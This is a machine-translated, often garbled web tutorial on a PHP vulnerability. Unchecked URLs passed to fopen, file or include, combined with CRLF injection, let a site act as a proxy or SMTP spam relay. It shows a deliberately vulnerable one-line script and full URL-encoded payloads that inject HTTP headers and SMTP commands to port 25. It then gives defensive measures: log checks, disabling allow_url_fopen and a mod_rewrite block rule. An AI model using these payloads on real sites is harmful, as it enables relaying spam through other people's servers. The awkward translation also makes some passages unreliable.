Home
Home Page
Krossbrauzernoe alignment on the center (table height=100 %)
Lists a la MS Word
Features of links « upwards pages »
Tables and borders
We get rid from cellpadding and cellspacing
Optimum use MySQL
Competent job with files: exclusive blocking of files
How to learn{find out} the size of a file on any web - server
Regular expressions
Processing of lines in RNR
Creation of system of the account of visitings
Tracking a content on dynamic sites
CSS: advice{councils} and receptions, a part 2
CSS: advice{councils} and receptions, a part 1
Ten rules of a spelling of a safe code on PHP
About tags and metatags
Potential vulnerability of php-scripts
Removal{Distance} of a line from a file
The generator of passwords
Links
topic
 

Potential vulnerability of php-scripts

Functions fopen, file, include and require can open files from other sites under reports http and ftp. This opportunity bears{carries} in itself potential vulnerability in the php-scripts, allowing to use a site as a proxy.

I warn anything new in this material will not be. Despite of impressing opportunities for the malefactor, the given vulnerability - simply a combination of well-known properties php.


In 2002 in parallel the several groups engaged in search ujazvimostej in ON, had been found out serious and powerful vulnerability in php.


On the Russian-speaking Internet this vulnerability practically has not been covered. On Russian-speaking sites on problems of safety I did not manage to find the direct message on this vulnerability.

Vulnerability: Url fopen wrapper


For increase in functionality and simplification of coding, developers php have made such feature in functions fopen, file, include and other. If the name of a file begins with http://, the server will execute HTTP-search, will download page, and will write down in a variable as from a usual file. Prefixes "ftp://", " php: // " (last is intended for reading and recording in stdin, stdout and stderr) similarly work. It was necessary that developers of sites not muchalis` with libraries of http-searches and did not write them manually. The given option is disconnected in adjustments php, parameter allow_url_fopen.

CR/LF In HTTP-searches


The combination of symbols carriage return and line feed in HTTP-search divides{shares} headings. In detail about it it is possible to esteem in Anton Kalmykova's clause{article} « Generation of HTTP-searches <http: // www.internet-technologies.ru/? url=http%3A%2F%2Fwww.phpclub.ru%2Farticle%2F2001-03-25> ». This combination of symbols can be passed in GET-search as "%0D%0A".

Untrusted input


On many sites of page are generated by a script - shablonizatorom. In a script perenapravljajutsja all searches of a site. From REQUEST_URI the name of a file which should be opened undertakes. The file is read out, to it  the pattern with navigation, a cap, etc. is added, and the result is given out to the client.


The careless or inexperienced programmer without ceremony can write opening of a file without check of the data:



<? php

echo implode (" ", file (substr ($REQUEST_URI, 1))); </php>


From search the first symbol - slehsh is rejected - and the file opens. The malefactor can easily enter as a way to a file on the server a line http://example.com: http://n00b.programmer.com/http://example.com Other variant - all addresses on a site look like http: // n00b.programmer.com/index.php? f=news In that case the malefactor will try to open the address such as http://n00b.programmer.com/index.php?f=http://example.com very important to not trust the entering data and to filter by means of regular expressions entering searches.



EHksplojt


As in the resulted example the address is not checked in any way, it is possible to insert a line into search with HTTP-search. If the malefactor will open a way



index.php? f=http%3A%2F%2Fexample.com%2F+HTTP%2F1.0%0D%0A%0D%0AHost: +example.com%0D%0AUser-agent: + Space+Bizon%2F9%2E11%2E2001 + %28Windows+67%29%0D%0Avar1%3Dfoo%26var2%3Dbar%0D%0A%0D%0A


That the script will execute HTTP-search:



GET example.com/ HTTP/1.0\r\n

Host: example.com\r\n

User-agent: Space Bizon/9.11.2001 (Windows 67) \r\n

var1=foo*var2=bar\r\n

\r\n

HTTP/1.0\r\n

Host: www.site1.st\r\n

User-Agent: PHP/4.1.2\r\n

\r\n


The script adds last three lines automatically, but two \r\n before them mean the end of search. Thus, the unprotected script can be used as a proxy. Knowing some "holey" sites, the malefactor can build from them a chain that it{he} was more complex  for finding.



Clever use ehksplojta


If at the provider giving free-of-charge demo - access, a holey site, it is possible to write a script for the domestic server which would form searches to such proxy and saved a few{a little;little bit} money. This business, certainly, within the jurisdiction and punishable, but by and large overindulgence. More profitable use of the another's machine as a proxy - dispatch of a commercial spam. An example from clause{article} written Ul`fom KHarnkhammarom <http: // www.internet-technologies.ru/? url=http%3A%2F%2Farchives.neohapsis.com%2Farchives%2Fvulnwatch%2F2002-q3%2F0109.html>:



index.php? f=http%3A%2F%2Fmail.example.com%3A25%2F+HTTP/1.0%0D%0AHELO +my.own.machine%0D%0AMAIL+FROM%3A%3Cme%40my.own.machine%3E%0D%0ARCPT +TO%3A%3Cinfo%40site1.st%3E%0D%0ADATA%0D%0Ai+will+never+say+the+word+PROCRASTINATE +again%0D%0A. % 0D%0AQUIT%0D%0A%0D%0A


(should be one line) module PHP will incorporate to the server mail.example.com on 25 port and will send the following search:



GET / HTTP/1.0\r\n

HELO my.own.machine\r\n

MAIL FROM:\r\n

RCPT TO:\r\n

DATA\r\n

i will never say the word PROCRASTINATE again\r\n

.\r\n

QUIT\r\n\r\n


HTTP/1.0\r\n

Host: mail.site1.st:25\r\n

User-Agent: PHP/4.1.2\r\n\r\n


PHP and a mail server will swear, but the letter will be sent. Having such vulnerability in someone's site, it is possible to search closed post relej, accepting from the maintained web - server for a mail. This relej will not be in black lists of providers, and dispatch of a spam can turn out very effective. On the site I have found set of searches with 25-th port in a way. And prior to the beginning of this year such searches were not. Earlier about such vulnerability knew units of curious users, and only the last year the hole became well-known and is put on a stream spammerami.



Measures of protection from ehksplojta


To you as to the developer or the owner of a site, it is important to do the utmost that through your site nobody could dispatch a spam. If it will turn out, he will be dispatched with any Hawaiian dialapa which owners do not understand human language, and extreme can make you.

Check of magazine of searches


For the beginning it is useful to familiarize with the list of the unique addresses required from a site. It will help to learn{find out}, whether there were cases of attacks and uses dyrki. Usually spamery at once check an opportunity of connection with necessary to them post releem on 25 port. Therefore to search follows lines ":25" and "%3A25".

Adjustment php


The most simple way to disconnect vozmozhuju vulnerability - to forbid to open URL through file functions. If you the manager of the server - forbid allow_url_fopen in adjustments php. If you simply the client - forbid at yourselves locally. In a file .htaccess for a root of a site write a line: php_value allow_url_fopen 0 If you the malicious hosting - provider, can forbid URL fopen wrapper for all clients by means of php_admin_value directive. Inclusion of a safe mode (safe mode) in this case will not help, function continues to work regularly.

Change of a code


Such complex  situation is possible{probable}: you the client, and the careless administrator of the hosting - provider has entered all installations php in php_admin_value, and to change them it is impossible. It is necessary to modify a code of scripts. The most simple way - to search for functions fopen, file and include, opening files from names of variables. And to cut out function str_replace prefixes http:// and ftp://. However, sometimes to a script, everything, is necessary to open addresses which come from the user. For example, the script - pornolizator which inserts into the text materki or replaces the text with broken Russian (" a line for nastajahhikh accof, fsem fftykat` "). Probably, most of all from careless programming these sites have suffered. In this case it is quite possible to be limited to a cutting "\r\n" from the received line. In that case the malefactor cannot add own heading to search which is sent by you.

Cessation of work at offensivnom search


The client scanning your site for not checked variables, creates the superfluous traffic and loads the processor of the server. Understandably, that pages which are generated with your site if they do not work as a proxy are not necessary for him. It is desirable to kill such searches even before start of the php-interpreter. It can be made by means of the module mod_rewrite. In a file .htaccess radically a site I have put such line:



RewriteRule ((%3A |:) 25 | % 0D%0A) - [G]


Thus it is supposed, that on a site will not be sent by method GET of the form with multilower case user input. Otherwise they will be stopped by this rule.


If you with the help mod_rewrite support the addressing convenient for reading most likely, a colon and CRLF are not used. Therefore other lines RewriteRule will not approach{suit} under scanning search, and a line stopping processing of search, it is better to place at the end of the list of rules. Then usual searches will correspond and be redirected till this line (use a flag [L]) that will reduce their time obabotki. Depending on different conditions it can vary.